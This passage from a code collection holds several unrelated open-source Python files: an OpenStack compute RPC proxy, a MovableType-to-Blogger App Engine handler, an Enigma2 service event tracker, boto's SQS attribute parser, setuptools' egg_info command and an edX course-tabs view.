reservations, migration):
return self.manager.finish_resize(ctxt, disk_info, image, instance,
reservations, migration)
def finish_revert_resize(self, ctxt, instance,
reservations, migration):
return self.manager.finish_revert_resize(ctxt, instance,
reservations, migration)
def get_console_output(self, ctxt, instance, tail_length):
return self.manager.get_console_output(ctxt, instance, tail_length)
def get_console_pool_info(self, ctxt, console_type):
return self.manager.get_console_pool_info(ctxt, console_type)
def get_console_topic(self, ctxt):
return self.manager.get_console_topic(ctxt)
def get_diagnostics(self, ctxt, instance):
return self.manager.get_diagnostics(ctxt, instance)
def get_instance_diagnostics(self, ctxt, instance):
return self.manager.get_instance_diagnostics(ctxt, instance)
def get_vnc_console(self, ctxt, console_type, instance):
return self.manager.get_vnc_console(ctxt, console_type, instance)
def get_spice_console(self, ctxt, console_type, instance):
return self.manager.get_spice_console(ctxt, console_type, instance)
def get_rdp_console(self, ctxt, console_type, instance):
return self.manager.get_rdp_console(ctxt, console_type, instance)
def get_serial_console(self, ctxt, console_type, instance):
return self.manager.get_serial_console(ctxt, console_type, instance)
def validate_console_port(self, ctxt, instance, port, console_type):
return self.manager.validate_console_port(ctxt, instance, port,
console_type)
def host_maintenance_mode(self, ctxt, host, mode):
return self.manager.host_maintenance_mode(ctxt, host, mode)
def host_power_action(self, ctxt, action):
return self.manager.host_power_action(ctxt, action)
def inject_network_info(self, ctxt, instance):
return self.manager.inject_network_info(ctxt, instance)
def live_migration(self, ctxt, dest, instance, block_migration,
migrate_data=None):
return self.manager.live_migration(ctxt, dest, instance,
block_migration,
migrate_data=migrate_data)
def pause_instance(self, ctxt, instance):
return self.manager.pause_instance(ctxt, instance)
def post_live_migration_at_destination(self, ctxt, instance,
block_migration):
return self.manager.post_live_migration_at_destination(
ctxt, instance, block_migration)
def pre_live_migration(self, ctxt, instance, block_migration, disk,
migrate_data=None):
return self.manager.pre_live_migration(ctxt, instance, block_migration,
disk, migrate_data=migrate_data)
def prep_resize(self, ctxt, image, instance, instance_type,
reservations=None, request_spec=None,
filter_properties=None, node=None, clean_shutdown=True):
return self.manager.prep_resize(ctxt, image, instance, instance_type,
reservations=reservations,
request_spec=request_spec,
filter_properties=filter_properties,
node=node,
clean_shutdown=clean_shutdown)
def reboot_instance(self, ctxt, instance, block_device_info, reboot_type):
return self.manager.reboot_instance(ctxt, instance, block_device_info,
reboot_type)
def rebuild_instance(self, ctxt, instance, orig_image_ref, image_ref,
injected_files, new_pass, orig_sys_metadata,
bdms, recreate, on_shared_storage,
preserve_ephemeral=False):
return self.manager.rebuild_instance(
ctxt, instance, orig_image_ref, image_ref,
injected_files, new_pass, orig_sys_metadata,
bdms, recreate, on_shared_storage,
preserve_ephemeral=preserve_ephemeral)
def refresh_security_group_rules(self, ctxt, security_group_id):
return self.manager.refresh_security_group_rules(ctxt,
security_group_id)
def refresh_security_group_members(self, ctxt, security_group_id):
return self.manager.refresh_security_group_members(ctxt,
security_group_id)
def refresh_instance_security_rules(self, ctxt, instance):
return self.manager.refresh_instance_security_rules(ctxt, instance)
def refresh_provider_fw_rules(self, ctxt):
return self.manager.refresh_provider_fw_rules(ctxt)
def remove_aggregate_host(self, ctxt, host, slave_info, aggregate):
return self.manager.remove_aggregate_host(ctxt,
host, slave_info,
aggregate)
def remove_fixed_ip_from_instance(self, ctxt, address, instance):
return self.manager.remove_fixed_ip_from_instance(ctxt, address,
instance)
def remove_volume_connection(self, ctxt, instance, volume_id):
return self.manager.remove_volume_connection(ctxt, instance, volume_id)
def rescue_instance(self, ctxt, instance, rescue_password,
rescue_image_ref, clean_shutdown):
return self.manager.rescue_instance(ctxt, instance, rescue_password,
rescue_image_ref=rescue_image_ref,
clean_shutdown=clean_shutdown)
def reset_network(self, ctxt, instance):
return self.manager.reset_network(ctxt, instance)
def resize_instance(self, ctxt, instance, image,
reservations, migration, instance_type,
clean_shutdown=True):
return self.manager.resize_instance(ctxt, instance, image,
reservations, migration,
instance_type,
clean_shutdown=clean_shutdown)
def resume_instance(self, ctxt, instance):
return self.manager.resume_instance(ctxt, instance)
def revert_resize(self, ctxt, instance, migration, reservations=None):
return self.manager.revert_resize(ctxt, instance, migration,
reservations=reservations)
def rollback_live_migration_at_destination(self, ctxt, instance,
destroy_disks,
migrate_data):
return self.manager.rollback_live_migration_at_destination(
ctxt, instance, destroy_disks=destroy_disks,
migrate_data=migrate_data)
def set_admin_password(self, ctxt, instance, new_pass):
return self.manager.set_admin_password(ctxt, instance, new_pass)
def set_host_enabled(self, ctxt, enabled):
return self.manager.set_host_enabled(ctxt, enabled)
def swap_volume(self, ctxt, instance, old_volume_id, new_volume_id):
return self.manager.swap_volume(ctxt, old_volume_id, new_volume_id,
instance)
def get_host_uptime(self, ctxt):
return self.manager.get_host_uptime(ctxt)
def reserve_block_device_name(self, ctxt, instance, device, volume_id,
disk_bus=None, device_type=None):
return self.manager.reserve_block_device_name(ctxt, instance, device,
volume_id,
disk_bus=disk_bus,
device_type=device_type,
return_bdm_object=True)
def backup_instance(self, ctxt, image_id, instance, backup_type,
rotation):
return self.manager.backup_instance(ctxt, image_id, instance,
backup_type, rotation)
def snapshot_instance(self, ctxt, image_id, instance):
return self.manager.snapshot_instance(ctxt, image_id, instance)
def start_instance(self, ctxt, instance):
return self.manager.start_instance(ctxt, instance)
def stop_instance(self, ctxt, instance, clean_shutdown):
return self.manager.stop_instance(ctxt, instance, clean_shutdown)
def suspend_instance(self, ctxt, instance):
return self.manager.suspend_instance(ctxt, instance)
def terminate_instance(self, ctxt, instance, bdms, reservations=None):
return self.manager.terminate_instance(ctxt, instance, bdms,
reservations=reservations)
def unpause_instance(self, ctxt, instance):
return self.manager.unpause_instance(ctxt, instance)
def unrescue_instance(self, ctxt, instance):
return self.manager.unrescue_instance(ctxt, instance)
def soft_delete_instance(self, ctxt, instance, reservations):
return self.manager.soft_delete_instance(ctxt, instance, reservations)
def restore_instance(self, ctxt, instance):
return self.manager.restore_instance(ctxt, instance)
def shelve_instance(self, ctxt, instance, image_id=None,
clean_shutdown=True):
return self.manager.shelve_instance(ctxt, instance, image_id=image_id,
clean_shutdown=clean_shutdown)
def shelve_offload_instance(self, ctxt, instance, clean_shutdown):
return self.manager.shelve_offload_instance(ctxt, instance,
clean_shutdown)
def unshelve_instance(self, ctxt, instance, image=None,
filter_properties=None, node=None):
return self.manager.unshelve_instance(
ctxt, instance, image=image,
filter_properties=filter_properties,
node=node)
def volume_snapshot_create(self, ctxt, instance, volume_id, create_info):
return self.manager.volume_snapshot_create(ctxt, instance, volume_id,
create_info)
def volume_snapshot_delete(self, ctxt, instance, volume_id, snapshot_id,
delete_info):
return self.manager.volume_snapshot_delete(ctxt, instance, volume_id,
snapshot_id, delete_info)
def external_instance_event(self, ctxt, instances, events):
return self.manager.external_instance_event(ctxt, instances, events)
def build_and_run_instance(self, ctxt, instance, image, request_spec,
filter_properties, admin_password=None,
injected_files=None, requested_networks=None,
security_groups=None, block_device_mapping=None,
node=None, limits=None):
return self.manager.build_and_run_instance(
ctxt, instance, image, request_spec, filter_properties,
admin_password=admin_password, injected_files=injected_files,
requested_networks=requested_networks,
security_groups=security_groups,
block_device_mapping=block_device_mapping,
node=node, limits=limits)
def quiesce_instance(self, ctxt, instance):
return self.manager.quiesce_instance(ctxt, instance)
def unquiesce_instance(self, ctxt, instance, mapping=None):
return self.manager.unquiesce_instance(ctxt, instance, mapping=mapping)
| apache-2.0 |
tectronics/google-blog-converters-appengine | src/movabletype2blogger/movabletype2blogger.py | 30 | 2023 | #!/usr/bin/env python
# Copyright 2008 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0.txt
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import cgi
import traceback
import StringIO
import gdata.service
import gdata.urlfetch
from google.appengine.ext import webapp
from google.appengine.ext.webapp.util import run_wsgi_app
import mt2b
import wsgiref.handlers
__author__ = 'JJ Lueck ([email protected])'
# Use urlfetch instead of httplib
gdata.service.http_request_handler = gdata.urlfetch
class TransformPage(webapp.RequestHandler):
def post(self):
# All input/output will be in UTF-8
self.response.charset = 'utf8'
    # Parse the multi-part form-data part out of the POST
input = self.request.get('input-file', allow_multiple=False)
# Run the blogger import processor
translator = mt2b.MovableType2Blogger()
try:
translator.Translate(StringIO.StringIO(input), self.response.out)
self.response.content_type = 'application/atom+xml'
self.response.headers['Content-Disposition'] = \
'attachment;filename=blogger-export.xml'
except:
# Just provide an error message to the user.
self.response.content_type = 'text/plain'
self.response.out.write("Error encountered during conversion.<br/><br/>")
exc = traceback.format_exc()
self.response.out.write(exc.replace('\n', '<br/>'))
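# Illustrative request sketch (not part of the original handler): the page is
# expected to receive a multipart form upload named 'input-file' holding a
# MovableType export, e.g. (host and filename are hypothetical)
#
#     curl -F 'input-file=@mt-export.txt' http://localhost:8080/mt2b/
#
# and replies with an Atom feed served as a blogger-export.xml attachment.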
application = webapp.WSGIApplication([('/mt2b/', TransformPage)],
debug=True)
def main():
run_wsgi_app(application)
if __name__ == '__main__':
main()
| apache-2.0 |
popazerty/try | lib/python/Components/ServiceEventTracker.py | 10 | 4229 | InfoBarCount = 0
class InfoBarBase:
onInfoBarOpened = [ ]
onInfoBarClosed = [ ]
@staticmethod
def connectInfoBarOpened(fnc):
if not fnc in InfoBarBase.onInfoBarOpened:
InfoBarBase.onInfoBarOpened.append(fnc)
@staticmethod
def disconnectInfoBarOpened(fnc):
if fnc in InfoBarBase.onInfoBarOpened:
InfoBarBase.onInfoBarOpened.remove(fnc)
@staticmethod
def infoBarOpened(infobar):
for x in InfoBarBase.onInfoBarOpened:
x(infobar)
@staticmethod
def connectInfoBarClosed(fnc):
if not fnc in InfoBarBase.onInfoBarClosed:
InfoBarBase.onInfoBarClosed.append(fnc)
@staticmethod
def disconnectInfoBarClosed(fnc):
if fnc in InfoBarBase.onInfoBarClosed:
InfoBarBase.onInfoBarClosed.remove(fnc)
@staticmethod
def infoBarClosed(infobar):
for x in InfoBarBase.onInfoBarClosed:
x(infobar)
def __init__(self, steal_current_service = False):
if steal_current_service:
ServiceEventTracker.setActiveInfoBar(self, None, None)
else:
nav = self.session.nav
ServiceEventTracker.setActiveInfoBar(self, not steal_current_service and nav.getCurrentService(), nav.getCurrentlyPlayingServiceOrGroup())
self.onClose.append(self.__close)
InfoBarBase.infoBarOpened(self)
global InfoBarCount
InfoBarCount += 1
def __close(self):
ServiceEventTracker.popActiveInfoBar()
InfoBarBase.infoBarClosed(self)
global InfoBarCount
InfoBarCount -= 1
class ServiceEventTracker:
"""Tracks service events into a screen"""
InfoBarStack = [ ]
InfoBarStackSize = 0
oldServiceStr = None
EventMap = { }
navcore = None
@staticmethod
def event(evt):
set = ServiceEventTracker
func_list = set.EventMap.setdefault(evt, [])
if func_list:
nav = set.navcore
cur_ref = nav.getCurrentlyPlayingServiceOrGroup()
try:
old_service_running = set.oldRef and cur_ref and cur_ref == set.oldRef and set.oldServiceStr == nav.getCurrentService().getPtrString()
except:
old_service_running = None
if not old_service_running and set.oldServiceStr:
set.oldServiceStr = None
set.oldRef = None
ssize = set.InfoBarStackSize
stack = set.InfoBarStack
for func in func_list:
if (func[0] or # let pass all events to screens not derived from InfoBarBase
(not old_service_running and stack[ssize-1] == func[1]) or # let pass events from currently running service just to current active screen (derived from InfoBarBase)
(old_service_running and ssize > 1 and stack[ssize-2] == func[1])): # let pass events from old running service just to previous active screen (derived from InfoBarBase)
func[2]()
@staticmethod
def setActiveInfoBar(infobar, old_service, old_ref):
set = ServiceEventTracker
set.oldRef = old_ref
set.oldServiceStr = old_service and old_service.getPtrString()
assert infobar not in set.InfoBarStack, "FATAL: Infobar '" + str(infobar) + "' is already active!"
set.InfoBarStack.append(infobar)
set.InfoBarStackSize += 1
# print "ServiceEventTracker set active '" + str(infobar) + "'"
@staticmethod
def popActiveInfoBar():
set = ServiceEventTracker
stack = set.InfoBarStack
if set.InfoBarStackSize:
nav = set.navcore
set.InfoBarStackSize -= 1
del stack[set.InfoBarStackSize]
old_service = nav.getCurrentService()
set.oldServiceStr = old_service and old_service.getPtrString()
set.oldRef = nav.getCurrentlyPlayingServiceOrGroup()
# if set.InfoBarStackSize:
# print "ServiceEventTracker reset active '" + str(stack[set.InfoBarStackSize-1]) + "'"
def __init__(self, screen, eventmap):
self.__screen = screen
self.__eventmap = eventmap
self.__passall = not isinstance(screen, InfoBarBase) # let pass all events to screens not derived from InfoBarBase
EventMap = ServiceEventTracker.EventMap
if not len(EventMap):
screen.session.nav.event.append(ServiceEventTracker.event)
ServiceEventTracker.navcore = screen.session.nav
EventMap = EventMap.setdefault
for x in eventmap.iteritems():
EventMap(x[0], []).append((self.__passall, screen, x[1]))
screen.onClose.append(self.__del_event)
def __del_event(self):
EventMap = ServiceEventTracker.EventMap.setdefault
for x in self.__eventmap.iteritems():
EventMap(x[0], []).remove((self.__passall, self.__screen, x[1]))
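# Illustrative usage sketch (not part of the original module): a screen that
# derives from InfoBarBase typically subscribes to player events by creating a
# tracker with an eventmap; the event constants and handler names below are
# examples only.
#
#     from enigma import iPlayableService
#
#     class MyInfoBar(InfoBarBase, Screen):
#         def __init__(self, session):
#             ...
#             ServiceEventTracker(screen=self, eventmap={
#                 iPlayableService.evStart: self.__serviceStarted,
#                 iPlayableService.evEnd: self.__serviceEnded,
#             })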
| gpl-2.0 |
abridgett/boto | boto/sqs/attributes.py | 223 | 1718 | # Copyright (c) 2006,2007 Mitch Garnaat http://garnaat.org/
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
"""
Represents an SQS Attribute Name/Value set
"""
class Attributes(dict):
def __init__(self, parent):
self.parent = parent
self.current_key = None
self.current_value = None
def startElement(self, name, attrs, connection):
pass
def endElement(self, name, value, connection):
if name == 'Attribute':
self[self.current_key] = self.current_value
elif name == 'Name':
self.current_key = value
elif name == 'Value':
self.current_value = value
else:
setattr(self, name, value)
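# Illustrative note (not part of the original class): during SAX parsing of a
# GetQueueAttributes response, endElement() receives Name/Value pairs such as
#
#     <Attribute>
#         <Name>ApproximateNumberOfMessages</Name>
#         <Value>5</Value>
#     </Attribute>
#
# after which this dict would contain {'ApproximateNumberOfMessages': '5'}.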
| mit |
ephoning/heroku-buildpack-python | vendor/distribute-0.6.36/setuptools/command/egg_info.py | 66 | 15621 | """setuptools.command.egg_info
Create a distribution's .egg-info directory and contents"""
# This module should be kept compatible with Python 2.3
import os, re, sys
from setuptools import Command
from distutils.errors import *
from distutils import log
from setuptools.command.sdist import sdist
from distutils.util import convert_path
from distutils.filelist import FileList as _FileList
from pkg_resources import parse_requirements, safe_name, parse_version, \
safe_version, yield_lines, EntryPoint, iter_entry_points, to_filename
from sdist import walk_revctrl
class egg_info(Command):
description = "create a distribution's .egg-info directory"
user_options = [
('egg-base=', 'e', "directory containing .egg-info directories"
" (default: top of the source tree)"),
('tag-svn-revision', 'r',
"Add subversion revision ID to version number"),
('tag-date', 'd', "Add date stamp (e.g. 20050528) to version number"),
('tag-build=', 'b', "Specify explicit tag to add to version number"),
('no-svn-revision', 'R',
"Don't add subversion revision ID [default]"),
('no-date', 'D', "Don't include date stamp [default]"),
]
boolean_options = ['tag-date', 'tag-svn-revision']
negative_opt = {'no-svn-revision': 'tag-svn-revision',
'no-date': 'tag-date'}
def initialize_options(self):
self.egg_name = None
self.egg_version = None
self.egg_base = None
self.egg_info = None
self.tag_build = None
self.tag_svn_revision = 0
self.tag_date = 0
self.broken_egg_info = False
self.vtags = None
def save_version_info(self, filename):
from setopt import edit_config
edit_config(
filename,
{'egg_info':
{'tag_svn_revision':0, 'tag_date': 0, 'tag_build': self.tags()}
}
)
def finalize_options (self):
self.egg_name = safe_name(self.distribution.get_name())
self.vtags = self.tags()
self.egg_version = self.tagged_version()
try:
list(
parse_requirements('%s==%s' % (self.egg_name,self.egg_version))
)
except ValueError:
raise DistutilsOptionError(
"Invalid distribution name or version syntax: %s-%s" %
(self.egg_name,self.egg_version)
)
if self.egg_base is None:
dirs = self.distribution.package_dir
self.egg_base = (dirs or {}).get('',os.curdir)
self.ensure_dirname('egg_base')
self.egg_info = to_filename(self.egg_name)+'.egg-info'
if self.egg_base != os.curdir:
self.egg_info = os.path.join(self.egg_base, self.egg_info)
if '-' in self.egg_name: self.check_broken_egg_info()
# Set package version for the benefit of dumber commands
# (e.g. sdist, bdist_wininst, etc.)
#
self.distribution.metadata.version = self.egg_version
# If we bootstrapped around the lack of a PKG-INFO, as might be the
# case in a fresh checkout, make sure that any special tags get added
# to the version info
#
pd = self.distribution._patched_dist
if pd is not None and pd.key==self.egg_name.lower():
pd._version = self.egg_version
pd._parsed_version = parse_version(self.egg_version)
self.distribution._patched_dist = None
def write_or_delete_file(self, what, filename, data, force=False):
"""Write `data` to `filename` or delete if empty
If `data` is non-empty, this routine is the same as ``write_file()``.
If `data` is empty but not ``None``, this is the same as calling
        ``delete_file(filename)``. If `data` is ``None``, then this is a no-op
unless `filename` exists, in which case a warning is issued about the
orphaned file (if `force` is false), or deleted (if `force` is true).
"""
if data:
self.write_file(what, filename, data)
elif os.path.exists(filename):
if data is None and not force:
log.warn(
"%s not set in setup(), but %s exists", what, filename
)
return
else:
self.delete_file(filename)
def write_file(self, what, filename, data):
"""Write `data` to `filename` (if not a dry run) after announcing it
`what` is used in a log message to identify what is being written
to the file.
"""
log.info("writing %s to %s", what, filename)
if sys.version_info >= (3,):
data = data.encode("utf-8")
if not self.dry_run:
f = open(filename, 'wb')
f.write(data)
f.close()
def delete_file(self, filename):
"""Delete `filename` (if not a dry run) after announcing it"""
log.info("deleting %s", filename)
if not self.dry_run:
os.unlink(filename)
def tagged_version(self):
version = self.distribution.get_version()
# egg_info may be called more than once for a distribution,
# in which case the version string already contains all tags.
if self.vtags and version.endswith(self.vtags):
return safe_version(version)
return safe_version(version + self.vtags)
def run(self):
self.mkpath(self.egg_info)
installer = self.distribution.fetch_build_egg
for ep in iter_entry_points('egg_info.writers'):
writer = ep.load(installer=installer)
writer(self, ep.name, os.path.join(self.egg_info,ep.name))
# Get rid of native_libs.txt if it was put there by older bdist_egg
nl = os.path.join(self.egg_info, "native_libs.txt")
if os.path.exists(nl):
self.delete_file(nl)
self.find_sources()
def tags(self):
version = ''
if self.tag_build:
version+=self.tag_build
if self.tag_svn_revision and (
os.path.exists('.svn') or os.path.exists('PKG-INFO')
): version += '-r%s' % self.get_svn_revision()
if self.tag_date:
import time; version += time.strftime("-%Y%m%d")
return version
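    # Illustrative example (not part of the original command): with
    # tag_build='.dev', tag_svn_revision enabled (revision 1234) and tag_date
    # enabled, tags() returns something like '.dev-r1234-20130501' and
    # tagged_version() appends it to the distribution version.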
def get_svn_revision(self):
revision = 0
urlre = re.compile('url="([^"]+)"')
revre = re.compile('committed-rev="(\d+)"')
for base,dirs,files in os.walk(os.curdir):
if '.svn' not in dirs:
dirs[:] = []
continue # no sense walking uncontrolled subdirs
dirs.remove('.svn')
f = open(os.path.join(base,'.svn','entries'))
data = f.read()
f.close()
if data.startswith('10') or data.startswith('9') or data.startswith('8'):
data = map(str.splitlines,data.split('\n\x0c\n'))
del data[0][0] # get rid of the '8' or '9' or '10'
dirurl = data[0][3]
localrev = max([int(d[9]) for d in data if len(d)>9 and d[9]]+[0])
elif data.startswith('<?xml'):
dirurl = urlre.search(data).group(1) # get repository URL
localrev = max([int(m.group(1)) for m in revre.finditer(data)]+[0])
else:
log.warn("unrecognized .svn/entries format; skipping %s", base)
dirs[:] = []
continue
if base==os.curdir:
base_url = dirurl+'/' # save the root url
elif not dirurl.startswith(base_url):
dirs[:] = []
continue # not part of the same svn tree, skip it
revision = max(revision, localrev)
return str(revision or get_pkg_info_revision())
def find_sources(self):
"""Generate SOURCES.txt manifest file"""
manifest_filename = os.path.join(self.egg_info,"SOURCES.txt")
mm = manifest_maker(self.distribution)
mm.manifest = manifest_filename
mm.run()
self.filelist = mm.filelist
def check_broken_egg_info(self):
bei = self.egg_name+'.egg-info'
if self.egg_base != os.curdir:
bei = os.path.join(self.egg_base, bei)
if os.path.exists(bei):
log.warn(
"-"*78+'\n'
"Note: Your current .egg-info directory has a '-' in its name;"
'\nthis will not work correctly with "setup.py develop".\n\n'
'Please rename %s to %s to correct this problem.\n'+'-'*78,
bei, self.egg_info
)
self.broken_egg_info = self.egg_info
self.egg_info = bei # make it work for now
class FileList(_FileList):
"""File list that accepts only existing, platform-independent paths"""
def append(self, item):
if item.endswith('\r'): # Fix older sdists built on Windows
item = item[:-1]
path = convert_path(item)
if sys.version_info >= (3,):
try:
if os.path.exists(path) or os.path.exists(path.encode('utf-8')):
self.files.append(path)
except UnicodeEncodeError:
# Accept UTF-8 filenames even if LANG=C
if os.path.exists(path.encode('utf-8')):
self.files.append(path)
else:
log.warn("'%s' not %s encodable -- skipping", path,
sys.getfilesystemencoding())
else:
if os.path.exists(path):
self.files.append(path)
class manifest_maker(sdist):
template = "MANIFEST.in"
def initialize_options (self):
self.use_defaults = 1
self.prune = 1
self.manifest_only = 1
self.force_manifest = 1
def finalize_options(self):
pass
def run(self):
self.filelist = FileList()
if not os.path.exists(self.manifest):
self.write_manifest() # it must exist so it'll get in the list
self.filelist.findall()
self.add_defaults()
if os.path.exists(self.template):
self.read_template()
self.prune_file_list()
self.filelist.sort()
self.filelist.remove_duplicates()
self.write_manifest()
def write_manifest (self):
"""Write the file list in 'self.filelist' (presumably as filled in
by 'add_defaults()' and 'read_template()') to the manifest file
named by 'self.manifest'.
"""
# The manifest must be UTF-8 encodable. See #303.
if sys.version_info >= (3,):
files = []
for file in self.filelist.files:
try:
file.encode("utf-8")
except UnicodeEncodeError:
log.warn("'%s' not UTF-8 encodable -- skipping" % file)
else:
files.append(file)
self.filelist.files = files
files = self.filelist.files
if os.sep!='/':
files = [f.replace(os.sep,'/') for f in files]
self.execute(write_file, (self.manifest, files),
"writing manifest file '%s'" % self.manifest)
def warn(self, msg): # suppress missing-file warnings from sdist
if not msg.startswith("standard file not found:"):
sdist.warn(self, msg)
def add_defaults(self):
sdist.add_defaults(self)
self.filelist.append(self.template)
self.filelist.append(self.manifest)
rcfiles = list(walk_revctrl())
if rcfiles:
self.filelist.extend(rcfiles)
elif os.path.exists(self.manifest):
self.read_manifest()
ei_cmd = self.get_finalized_command('egg_info')
self.filelist.include_pattern("*", prefix=ei_cmd.egg_info)
def prune_file_list (self):
build = self.get_finalized_command('build')
base_dir = self.distribution.get_fullname()
self.filelist.exclude_pattern(None, prefix=build.build_base)
self.filelist.exclude_pattern(None, prefix=base_dir)
sep = re.escape(os.sep)
self.filelist.exclude_pattern(sep+r'(RCS|CVS|\.svn)'+sep, is_regex=1)
def write_file (filename, contents):
"""Create a file with the specified name and write 'contents' (a
sequence of strings without line terminators) to it.
"""
contents = "\n".join(contents)
if sys.version_info >= (3,):
contents = contents.encode("utf-8")
f = open(filename, "wb") # always write POSIX-style manifest
f.write(contents)
f.close()
def write_pkg_info(cmd, basename, filename):
log.info("writing %s", filename)
if not cmd.dry_run:
metadata = cmd.distribution.metadata
metadata.version, oldver = cmd.egg_version, metadata.version
metadata.name, oldname = cmd.egg_name, metadata.name
try:
# write unescaped data to PKG-INFO, so older pkg_resources
# can still parse it
metadata.write_pkg_info(cmd.egg_info)
finally:
metadata.name, metadata.version = oldname, oldver
safe = getattr(cmd.distribution,'zip_safe',None)
import bdist_egg; bdist_egg.write_safety_flag(cmd.egg_info, safe)
def warn_depends_obsolete(cmd, basename, filename):
if os.path.exists(filename):
log.warn(
"WARNING: 'depends.txt' is not used by setuptools 0.6!\n"
"Use the install_requires/extras_require setup() args instead."
)
def write_requirements(cmd, basename, filename):
dist = cmd.distribution
data = ['\n'.join(yield_lines(dist.install_requires or ()))]
for extra,reqs in (dist.extras_require or {}).items():
data.append('\n\n[%s]\n%s' % (extra, '\n'.join(yield_lines(reqs))))
cmd.write_or_delete_file("requirements", filename, ''.join(data))
def write_toplevel_names(cmd, basename, filename):
pkgs = dict.fromkeys(
[k.split('.',1)[0]
for k in cmd.distribution.iter_distribution_names()
]
)
cmd.write_file("top-level names", filename, '\n'.join(pkgs)+'\n')
def overwrite_arg(cmd, basename, filename):
write_arg(cmd, basename, filename, True)
def write_arg(cmd, basename, filename, force=False):
argname = os.path.splitext(basename)[0]
value = getattr(cmd.distribution, argname, None)
if value is not None:
value = '\n'.join(value)+'\n'
cmd.write_or_delete_file(argname, filename, value, force)
def write_entries(cmd, basename, filename):
ep = cmd.distribution.entry_points
if isinstance(ep,basestring) or ep is None:
data = ep
elif ep is not None:
data = []
for section, contents in ep.items():
if not isinstance(contents,basestring):
contents = EntryPoint.parse_group(section, contents)
contents = '\n'.join(map(str,contents.values()))
data.append('[%s]\n%s\n\n' % (section,contents))
data = ''.join(data)
cmd.write_or_delete_file('entry points', filename, data, True)
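# Illustrative example (not part of the original module): given
#
#     entry_points={'console_scripts': ['mytool = mypkg.cli:main']}
#
# write_entries() would produce an entry_points.txt along the lines of
#
#     [console_scripts]
#     mytool = mypkg.cli:main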
def get_pkg_info_revision():
# See if we can get a -r### off of PKG-INFO, in case this is an sdist of
# a subversion revision
#
if os.path.exists('PKG-INFO'):
f = open('PKG-INFO','rU')
for line in f:
match = re.match(r"Version:.*-r(\d+)\s*$", line)
if match:
return int(match.group(1))
f.close()
return 0
#
| mit |
ak2703/edx-platform | cms/djangoapps/contentstore/views/tabs.py | 125 | 7890 | """
Views related to course tabs
"""
from student.auth import has_course_author_access
from util.json_request import expect_json, JsonResponse
from django.http import HttpResponseNotFound
from django.contrib.auth.decorators import login_required
from django.core.exceptions import PermissionDenied
from django.views.decorators.csrf import ensure_csrf_cookie
from django.views.decorators.http import require_http_methods
from edxmako.shortcuts import render_to_response
from xmodule.modulestore.django import modulestore
from xmodule.modulestore import ModuleStoreEnum
from xmodule.tabs import CourseTabList, CourseTab, InvalidTabsException, StaticTab
from opaque_keys.edx.keys import CourseKey, UsageKey
from ..utils import get_lms_link_for_item
__all__ = ['tabs_handler']
@expect_json
@login_required
@ensure_csrf_cookie
@require_http_methods(("GET", "POST", "PUT"))
def tabs_handler(request, course_key_string):
"""
The restful handler for static tabs.
GET
html: return page for editing static tabs
json: not supported
PUT or POST
json: update the tab order. It is expected that the request body contains a JSON-encoded dict with entry "tabs".
The value for "tabs" is an array of tab locators, indicating the desired order of the tabs.
Creating a tab, deleting a tab, or changing its contents is not supported through this method.
Instead use the general xblock URL (see item.xblock_handler).
"""
course_key = CourseKey.from_string(course_key_string)
if not has_course_author_access(request.user, course_key):
raise PermissionDenied()
course_item = modulestore().get_course(course_key)
if 'application/json' in request.META.get('HTTP_ACCEPT', 'application/json'):
if request.method == 'GET':
raise NotImplementedError('coming soon')
else:
if 'tabs' in request.json:
return reorder_tabs_handler(course_item, request)
elif 'tab_id_locator' in request.json:
return edit_tab_handler(course_item, request)
else:
raise NotImplementedError('Creating or changing tab content is not supported.')
elif request.method == 'GET': # assume html
# get all tabs from the tabs list: static tabs (a.k.a. user-created tabs) and built-in tabs
# present in the same order they are displayed in LMS
tabs_to_render = []
for tab in CourseTabList.iterate_displayable(course_item, inline_collections=False):
if isinstance(tab, StaticTab):
# static tab needs its locator information to render itself as an xmodule
static_tab_loc = course_key.make_usage_key('static_tab', tab.url_slug)
tab.locator = static_tab_loc
tabs_to_render.append(tab)
return render_to_response('edit-tabs.html', {
'context_course': course_item,
'tabs_to_render': tabs_to_render,
'lms_link': get_lms_link_for_item(course_item.location),
})
else:
return HttpResponseNotFound()
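# Illustrative request sketch (not part of the original handler): reordering is
# requested by POSTing a JSON body whose "tabs" entry lists tab_id/locator
# dicts in the desired order; the identifiers below are made up.
#
#     {"tabs": [{"tab_id": "info"},
#               {"tab_locator": "block-v1:edX+Demo+2015+type@static_tab+block@extra"},
#               {"tab_id": "discussion"}]}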
def reorder_tabs_handler(course_item, request):
"""
Helper function for handling reorder of tabs request
"""
# Tabs are identified by tab_id or locators.
# The locators are used to identify static tabs since they are xmodules.
# Although all tabs have tab_ids, newly created static tabs do not know
# their tab_ids since the xmodule editor uses only locators to identify new objects.
requested_tab_id_locators = request.json['tabs']
# original tab list in original order
old_tab_list = course_item.tabs
# create a new list in the new order
new_tab_list = []
for tab_id_locator in requested_tab_id_locators:
tab = get_tab_by_tab_id_locator(old_tab_list, tab_id_locator)
if tab is None:
return JsonResponse(
{"error": "Tab with id_locator '{0}' does not exist.".format(tab_id_locator)}, status=400
)
new_tab_list.append(tab)
# the old_tab_list may contain additional tabs that were not rendered in the UI because of
# global or course settings. so add those to the end of the list.
non_displayed_tabs = set(old_tab_list) - set(new_tab_list)
new_tab_list.extend(non_displayed_tabs)
